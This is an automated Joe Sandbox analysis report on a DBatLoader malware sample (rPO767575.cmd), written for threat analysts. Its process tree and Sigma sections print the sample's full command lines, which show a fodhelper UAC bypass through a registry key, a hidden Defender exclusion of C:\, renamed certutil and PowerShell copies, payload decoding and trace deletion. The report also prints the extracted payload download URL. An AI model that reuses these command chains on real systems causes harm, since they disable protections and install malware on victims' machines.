Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rPO767575.cmd

Overview

General Information

Sample name:rPO767575.cmd
Analysis ID:1515085
MD5:5e052709f9e7b0b0ea90de7b99b8cc43
SHA1:88c7a864f7329bddc022736ab869708792e3dd91
SHA256:1f4f6c2f96f8ceae07c5abfa215a95a6788ec2e74c6a941c94c54dbca211ba69
Tags:cmduser-Porcupine
Infos:

Detection

DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2616 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 3068 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 5792 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 5816 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 5316 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 4520 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 5824 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7124 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 5976 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 3020 cmdline: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 4940 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 3800 cmdline: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6680 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 3364 cmdline: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6820 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • xkn.exe (PID: 6528 cmdline: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • alpha.exe (PID: 4788 cmdline: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • ger.exe (PID: 4128 cmdline: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • alpha.exe (PID: 2300 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 4508 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • per.exe (PID: 4932 cmdline: "C:\\Windows \\System32\\per.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
    • alpha.exe (PID: 7248 cmdline: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7288 cmdline: taskkill /F /IM SystemSettings.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • Ping_c.pif (PID: 7348 cmdline: C:\Users\Public\Libraries\Ping_c.pif MD5: 66561F313D11178EEE1955CE46E4CEA0)
    • alpha.exe (PID: 7372 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7392 cmdline: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7412 cmdline: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7428 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7444 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7460 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7504 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7520 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • SystemSettingsAdminFlows.exe (PID: 7340 cmdline: "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper MD5: 5FA3EEF00388ED6344B4C35BA7CAA460)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
rPO767575.cmdMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x59:$s2: :~12,1%%
  • 0x64:$s2: :~48,1%%
  • 0x6f:$s2: :~55,1%%
  • 0x7a:$s2: :~30,1%%
  • 0x85:$s2: :~34,1%
  • 0x95:$s2: :~46,1%%
  • 0xa0:$s2: :~21,1%%
  • 0xab:$s2: :~19,1%%
  • 0xb6:$s2: :~22,1%%
  • 0xc1:$s2: :~38,1%%
  • 0xcc:$s2: :~60,1%%
  • 0xe0:$s2: :~54,1%%
  • 0xeb:$s2: :~15,1%%
  • 0xf6:$s2: :~17,1%%
  • 0x101:$s2: :~2,1%%
  • 0x10b:$s2: :~0,1%%
  • 0x115:$s2: :~28,1%%
  • 0x120:$s2: :~49,1%%
  • 0x12b:$s2: :~6,1%%
  • 0x135:$s2: :~5,1%%

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    31.2.Ping_c.pif.2940000.0.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      31.2.Ping_c.pif.2940000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: TrustedPath UAC Bypass Pattern
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\\Windows \\System32\\per.exe" , CommandLine: "C:\\Windows \\System32\\per.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\per.exe, NewProcessName: C:\Windows \System32\per.exe, OriginalFileName: C:\Windows \System32\per.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\\Windows \\System32\\per.exe" , ProcessId: 4932, ProcessName: per.exe
        Sigma detected: Execution from Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " , ProcessId: 5792, ProcessName: alpha.exe
        Sigma detected: Parent in Public Folder Suspicious Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 5316, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 4520, ProcessName: extrac32.exe
        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 6820, ProcessName: alpha.exe
        Sigma detected: Suspicious Program Location with Network Connections
        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 13.107.137.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\Ping_c.pif, Initiated: true, ProcessId: 7348, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49707
        Sigma detected: Execution of Suspicious File Type Extension
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\Ping_c.pif, CommandLine: C:\Users\Public\Libraries\Ping_c.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Ping_c.pif, NewProcessName: C:\Users\Public\Libraries\Ping_c.pif, OriginalFileName: C:\Users\Public\Libraries\Ping_c.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\Ping_c.pif, ProcessId: 7348, ProcessName: Ping_c.pif
        Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\Public\xkn.exe, ProcessId: 6528, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suyjvk0i.1uq.ps1
        Sigma detected: Powershell Defender Exclusion
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 6820, ProcessName: alpha.exe
        Sigma detected: Suspicious Reg Add Open Command
        Source: Process startedAuthor: frack113: Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rPO767575.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 6820, ProcessName: alpha.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\Users\Public\Libraries\Ping_c.pifAvira: detection malicious, Label: TR/AD.Nekark.qzqtk
        Found malware configuration
        Source: 31.0.Ping_c.pif.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0"]}
        Multi AV Scanner detection for submitted file
        Source: rPO767575.cmdReversingLabs: Detection: 50%
        Source: rPO767575.cmdVirustotal: Detection: 43%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.8% probability
        Machine Learning detection for dropped file
        Source: C:\Users\Public\Libraries\Ping_c.pifJoe Sandbox ML: detected
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F62C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,9_2_00007FF607F62C2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F62F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,9_2_00007FF607F62F38
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF8940
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,9_2_00007FF607FFC940
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,9_2_00007FF607F7C960
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608022994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,9_2_00007FF608022994
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,9_2_00007FF607FB29A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF099C BCryptOpenAlgorithmProvider,#205,#359,#359,9_2_00007FF607FF099C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF60802A9F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,9_2_00007FF607FBE9F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,9_2_00007FF607FDAA00
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,9_2_00007FF607FF4A1C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0A18 BCryptSetProperty,#205,#359,#357,#357,9_2_00007FF607FF0A18
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,9_2_00007FF607FD4A34
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F66A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,9_2_00007FF607F66A84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,9_2_00007FF607FDEA7C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608022A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,9_2_00007FF608022A78
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF8AA0
